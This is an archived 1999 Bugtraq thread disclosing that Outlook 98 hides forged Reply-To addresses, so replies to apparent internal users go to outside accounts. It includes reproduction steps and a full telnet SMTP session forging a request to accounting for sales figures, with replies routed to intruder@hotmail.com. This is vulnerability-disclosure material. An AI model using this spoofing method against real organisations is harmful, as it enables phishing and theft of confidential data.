home *** CD-ROM | disk | FTP | other *** search
- Date: Tue, 20 Apr 1999 15:10:05 -0700
- From: Nate Lawson <nate@root.org>
- To: BUGTRAQ@netspace.org
- Subject: Outlook 98 allows spoofing internal users
-
- Problem: Outlook uses a sender's Reply-To address silently, allowing
- a user to inadvertently send data to an Internet mail account
- when intending to reply to an internal, trusted user.
-
- Impact: Anyone on the Internet can spoof a trusted internal Exchange user
- and get replies sent back to themself without the user knowing they
- weren't responding to another internal user.
-
- How to reproduce:
-
- 1. Spoof mail as an internal user with a Reply-To address claiming to be
- an internal user, but an address of an Internet account, say hotmail.
- 2. Go into Outlook and read the mail. The mail looks like it was internally
- generated but viewing the full Internet headers under View->Options
- shows the bogus Reply-To header.
- 3. Hit Reply in Outlook. The To: field looks like it's going to a valid
- internal user, but right clicking on it and choosing Properties shows
- that the internal user it is sending the reply to is actually an Internet
- address.
- 4. Enter some text and hit Send. Observe that the mail went to the attacker's
- account, not the internal one.
-
- A quick script:
-
- {root 5:00pm} ~> telnet mail.example.com 25
- Trying 10.20.2.5...
- Connected to mail.example.com.
- Escape character is '^]'.
- 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
- helo losebag
- 250 OK
- mail from:<>
- 250 OK - mail from <>
- rcpt to:<accounting@example.com>
- 250 OK - Recipient <accounting@example.com>
- data
- 354 Send data. End with CRLF.CRLF
- >From: Nate Lawson
- To: Accounting
- Reply To: Nate Lawson<intruder@hotmail.com>
- Subject: important!
-
- Please reply with the latest copy of our sales figures!
-
- Thanks,
- Nate
- .
- 250 OK
- quit
- 221 closing connection
- Connection closed by foreign host.
-
- Now, a reply to the email will go not to the trusted internal user Nate
- Lawson <nlawson@example.com> but to the attacker, <intruder@hotmail.com>.
- Worse, the user sees no indication that the mail is outward-bound! The
- To: field on the reply simply shows "Nate Lawson", a valid internal user.
-
- Affected programs: Only tested on Outlook 98
-
- Known use of this bug to get confidential information: none yet
-
- Suggested Fix: always show the full email address of any recipient that is
- not local (i.e. username@example.com would be hidden but any instance of
- user@hotmail.com would be shown)
-
- Microsoft has been notified, but claimed this was a weakness in SMTP and
- would not be fixed until a secure successor to SMTP is implemented. They
- obviouly missed the point -- the error is not in that mail can be forged,
- but that Outlook allows a user to respond to a message that looks local
- and legitimate, but is actually destined for an outside address.
-
- -Nate
-
- -----------------------------------------------------------------------
-
- Date: Sun, 25 Apr 1999 18:36:11 +0200
- From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
- To: BUGTRAQ@netspace.org
- Subject: Re: Outlook 98 allows spoofing internal users
-
- On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote:
- >
- > Suggested Fix: always show the full email address of any recipient that is
- > not local (i.e. username@example.com would be hidden but any instance of
- > user@hotmail.com would be shown)
-
- Yeah, like: I am user@aol.com and I'd like outlook to hide evilhacker@aol.com.
-
- Outlook should not be hiding anything..
-
- Greetz, Peter
- --
- | 'He broke my heart, | Peter van Dijk |
- I broke his neck' | peter@attic.vuurwerk.nl |
- nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
- | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
-
-
-
